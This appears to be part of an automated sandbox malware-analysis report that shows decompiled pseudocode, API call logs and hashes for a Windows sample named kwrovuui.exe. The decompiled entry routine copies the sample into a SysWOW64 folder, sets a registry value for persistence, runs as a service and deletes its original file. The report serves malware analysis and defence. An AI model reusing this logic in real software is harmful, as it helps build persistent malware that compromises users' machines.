								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

0x00402f2e
0x00402f34
0x00402f36
0x00402f3d
0x00402f42
0x00402f4d
0x00402f88
0x00402f8b
0x00402f8e
0x00402f93
0x00402f93
0x00402f96
0x00402f98
0x00402f9b
0x00402f9e
0x00402f9e
0x00402fa0
0x00402fa1
0x00402fae
0x00402fb3
0x00402fb7
0x00402fbe
0x00402fc1
0x00402fc3
0x00402fc5
0x00402fca
0x00402fcd
0x00000000
0x00000000
0x00000000
0x00402fcd
0x00402fdb
0x00402fe3
0x00402fe8
0x004030ad
0x00000000
0x004030af
0x00402ff3
0x00402ff4
0x00402ff7
0x00402ff9
0x00402ffd
0x00403001
0x00403017
0x0040301a
0x00403021
0x00403028
0x0040302b
0x0040302e
0x00403031
0x00403034
0x00403034
0x00403036
0x00403037
0x00403049
0x00403051
0x00403054
0x00403057
0x00403059
0x0040305c
0x0040305c
0x0040305e
0x0040305f
0x0040306b
0x00403070
0x00403076
0x00403079
0x0040307c
0x0040307c
0x0040307e
0x0040307f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403003
0x00403003
0x0040300d
0x0040300f
0x0040300f
0x0040300f
0x00403012
0x00403013
0x00000000
0x00403083
0x0040308f
0x00403094
0x0040309d
0x004030a0
0x004030a3
0x004030a4
0x00000000
0x00402ff7
0x00402f4f
0x00402f4f
0x00402f52
0x00402f54
0x00402f54
0x00402f57
0x00402f57
0x00402f59
0x00402f5a
0x00402f66
0x00402f6e
0x00402f7a
0x00000000
0x00402f7a
0x00000000

APIs

Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
HeapFree.KERNEL32(00000000), ref: 00402F7A

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kwrovuui.exe PID: 5672 Parent PID: 568 kwrovuui.exeCOMMON

Executed Functions

Function 00409A6B, Relevance: 102.3, APIs: 48, Strings: 10, Instructions: 799
stringsleepregistryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				void* _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8; // 0x43
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x186a0;
							if(_t239 -  *0x4133d0 < 0x186a0) {
								L131:
								Sleep(0x2710);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00("C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64); // executed
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00("mmeemcze",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08("C:\Users\jones\Desktop\HsWJJz7nq4.exe",  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = RtlAllocateHeap( &_v1272); // executed
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x5e5e5e5e;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x5e5e5e5e);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x5e060108;
												 *0x412180 = 0x5e060108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}

0x00409a7f
0x00409a83
0x00409a8a
0x00409a90
0x00409a97
0x00409a9d
0x0040a3cc
0x0040a3d2
0x0040a41c
0x0040a42c
0x0040a43a
0x0040a440
0x0040a448
0x0040a452
0x0040a45a
0x0040a469
0x0040a46b
0x0040a470
0x0040a475
0x0040a47a
0x0040a48a
0x0040a48c
0x0040a497
0x0040a497
0x0040a49d
0x00000000
0x00000000
0x0040a49f
0x0040a4a7
0x0040a4ac
0x0040a4be
0x0040a4c3
0x00000000
0x0040a4c3
0x0040a4ae
0x0040a4ae
0x0040a4b3
0x0040a4b5
0x0040a4b9
0x0040a4b9
0x00000000
0x0040a4b5
0x0040a497
0x0040a3da
0x0040a406
0x0040a407
0x0040a409
0x0040a40b
0x00000000
0x00000000
0x0040a3e8
0x0040a3eb
0x00000000
0x00000000
0x0040a3ed
0x0040a3f3
0x0040a3f6
0x00000000
0x00000000
0x0040a3f8
0x0040a3f8
0x0040a3f8
0x0040a400
0x0040a400
0x0040a414
0x0040a419
0x00000000
0x00409aa3
0x00409ab0
0x00409ac2
0x00409ac4
0x00409ac4
0x00409ad1
0x00409ae1
0x00409aef
0x00409af4
0x00409af9
0x00409afb
0x00409afb
0x00409af9
0x00409afd
0x00409b14
0x00409b1a
0x00409b26
0x00409b2b
0x00409b33
0x00409b36
0x00409b3b
0x00409b41
0x00409c26
0x00409c2b
0x00409c2e
0x00409c33
0x0040a1de
0x0040a1e4
0x0040a1fd
0x0040a211
0x0040a214
0x0040a219
0x0040a21c
0x0040a21f
0x0040a2e2
0x0040a305
0x0040a308
0x0040a30d
0x0040a310
0x0040a313
0x0040a35a
0x0040a35a
0x0040a35f
0x0040a361
0x0040a3c2
0x00409c05
0x00409c06
0x00409c06
0x0040a363
0x0040a369
0x0040a397
0x0040a397
0x0040a39d
0x0040a3a3
0x0040a3aa
0x0040a3b1
0x0040a3b4
0x0040a3b7
0x00000000
0x0040a3b7
0x0040a36b
0x0040a371
0x0040a374
0x0040a374
0x0040a376
0x0040a377
0x0040a377
0x0040a37d
0x0040a380
0x00000000
0x00000000
0x0040a38e
0x0040a394
0x00000000
0x0040a394
0x0040a318
0x0040a31e
0x0040a324
0x0040a325
0x0040a327
0x0040a339
0x0040a33b
0x0040a33d
0x0040a340
0x0040a344
0x0040a344
0x0040a34c
0x0040a351
0x0040a354
0x00000000
0x0040a354
0x0040a329
0x0040a32b
0x0040a32e
0x0040a32e
0x0040a330
0x0040a331
0x0040a331
0x0040a337
0x0040a337
0x00000000
0x0040a337
0x0040a228
0x0040a22b
0x0040a231
0x0040a234
0x0040a237
0x0040a27a
0x0040a280
0x0040a281
0x0040a283
0x0040a28e
0x0040a28e
0x0040a28e
0x0040a291
0x0040a294
0x0040a297
0x0040a2a5
0x0040a2ad
0x0040a2b4
0x0040a2b4
0x0040a2b7
0x0040a2b7
0x0040a2bd
0x0040a2d0
0x0040a2d5
0x0040a2d5
0x0040a2d8
0x00000000
0x0040a2d8
0x0040a242
0x0040a245
0x0040a24b
0x0040a24c
0x0040a24e
0x00000000
0x00000000
0x0040a253
0x0040a264
0x0040a26c
0x00000000
0x0040a26c
0x00409c39
0x00409c3f
0x0040a167
0x0040a183
0x0040a190
0x0040a196
0x0040a198
0x0040a198
0x0040a1a2
0x0040a1b3
0x0040a1b6
0x0040a1bc
0x0040a1bf
0x0040a1c7
0x0040a1cc
0x0040a1cc
0x0040a1bf
0x0040a1a2
0x00000000
0x00409c54
0x00409c56
0x00409c5b
0x00409c62
0x00000000
0x00000000
0x00409c74
0x00409c79
0x00409c7c
0x00409c81
0x00000000
0x00409c90
0x00409c94
0x00409c97
0x00409c9a
0x00409e3e
0x00409e3e
0x00409e42
0x0040a155
0x0040a158
0x0040a15d
0x0040a161
0x00000000
0x00000000
0x00000000
0x0040a161
0x00409e66
0x00409e6b
0x00409e75
0x00409e77
0x0040a14a
0x0040a14d
0x0040a152
0x00000000
0x0040a152
0x00409e98
0x00409e9d
0x00409ea0
0x00409ea2
0x00000000
0x00000000
0x00409eab
0x00409eb0
0x00409ec1
0x00409ec8
0x00409ed5
0x00409edb
0x00409ee3
0x00409ee4
0x00409ee8
0x00409eeb
0x00409ef2
0x00409ef9
0x00409efc
0x00409efd
0x00409f03
0x00409f03
0x00409f08
0x00409f09
0x00409f0e
0x00409f11
0x00409f2d
0x00409f32
0x00409f3b
0x00409f41
0x00409f44
0x00409f46
0x00409f4b
0x00409f4b
0x00409f67
0x00409f6a
0x00409f6a
0x00409f73
0x00409f82
0x00409f8e
0x00409f98
0x00409f9d
0x00409fb4
0x00409fba
0x00409fbc
0x00409fc2
0x00409fc9
0x00409fcf
0x00409fd2
0x00409fd4
0x00409fda
0x00409fda
0x00409fdd
0x00409fe1
0x00409fe7
0x00409feb
0x00409ff1
0x00409ff4
0x00409ff8
0x00409ffb
0x00409ffe
0x0040a004
0x0040a007
0x0040a010
0x0040a025
0x0040a038
0x0040a041
0x0040a046
0x0040a049
0x0040a050
0x0040a05e
0x0040a05e
0x0040a072
0x0040a078
0x0040a07f
0x0040a08d
0x0040a08d
0x0040a093
0x0040a093
0x0040a007
0x00409feb
0x00409fe1
0x0040a09a
0x0040a09d
0x0040a09f
0x0040a0a2
0x0040a0b6
0x0040a0de
0x0040a0e7
0x0040a0ec
0x0040a0fd
0x0040a0fd
0x0040a0a2
0x0040a120
0x0040a126
0x0040a128
0x0040a131
0x0040a137
0x0040a137
0x0040a13a
0x0040a13e
0x0040a140
0x0040a143
0x0040a145
0x0040a145
0x0040a143
0x00000000
0x0040a13e
0x00409ef4
0x00409ef7
0x00000000
0x00000000
0x00000000
0x00409ef7
0x00409cac
0x00409cb2
0x00409cb4
0x00000000
0x00000000
0x00409cd5
0x00409cda
0x00409cdf
0x00000000
0x00000000
0x00409ce9
0x00409cec
0x00409d58
0x00409d59
0x00409d64
0x00409d65
0x00409d6a
0x00409d7a
0x00409d8b
0x00409d9d
0x00409da3
0x00409da3
0x00000000
0x00409cf6
0x00409cf6
0x00409cfc
0x00409cff
0x00409cff
0x00409d01
0x00409d02
0x00409d06
0x00409d0a
0x00409d16
0x00409d16
0x00409d17
0x00409d1b
0x00409d2f
0x00409d2f
0x00409d3e
0x00409d41
0x00409d49
0x00409d4f
0x00409d52
0x00409da5
0x00409da8
0x00409db6
0x00409db6
0x00409db0
0x00409db0
0x00409db0
0x00409db7
0x00409db8
0x00409dbf
0x00409dc3
0x00409dca
0x00409dd1
0x00409dd2
0x00409dd7
0x00409ddc
0x00409e21
0x00409e26
0x00409e29
0x00000000
0x00409dde
0x00409df5
0x00409e0c
0x00409e11
0x00409e16
0x00409e1c
0x00409e2e
0x00409e2e
0x00409e38
0x00000000
0x00409e38
0x00409df9
0x00409dfd
0x00409dff
0x00409dff
0x00409e04
0x00000000
0x00409e04
0x00409d1d
0x00409d1d
0x00409d23
0x00409d2a
0x00409d2d
0x00000000
0x00000000
0x00000000
0x00409d2d
0x00000000
0x00409d23
0x00409d1b
0x00409cec
0x00409c81
0x00409c3f
0x00409b47
0x00409b4a
0x00409b4d
0x00409b56
0x00409b8b
0x00409b91
0x00409b92
0x00409b94
0x00409b9f
0x00409b9f
0x00409b9f
0x00409ba4
0x00409ba4
0x00409bb3
0x00409bb8
0x00409bbf
0x00409bbf
0x00409bc2
0x00409bc8
0x00409bde
0x00409be3
0x00409be8
0x00409bfa
0x00409bff
0x00409c02
0x00409c02
0x00409be8
0x00000000
0x00409bc8
0x00409b58
0x00409b5e
0x00409b64
0x00409b67
0x00000000
0x00409b69
0x00409b6b
0x00409b7a
0x00409b7f
0x00000000
0x00409b7f
0x00409b67

APIs

SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
SetErrorMode.KERNELBASE(00000003), ref: 00409A83
SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A

Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78

GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
GetCommandLineA.KERNEL32 ref: 00409AFD
lstrlenA.KERNEL32(?), ref: 00409B99
ExitProcess.KERNEL32 ref: 00409C06
GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
lstrcatA.KERNEL32(?,?), ref: 00409D8B
lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
DeleteFileA.KERNEL32(00000022), ref: 00409E38
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
RtlAllocateHeap.NTDLL(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
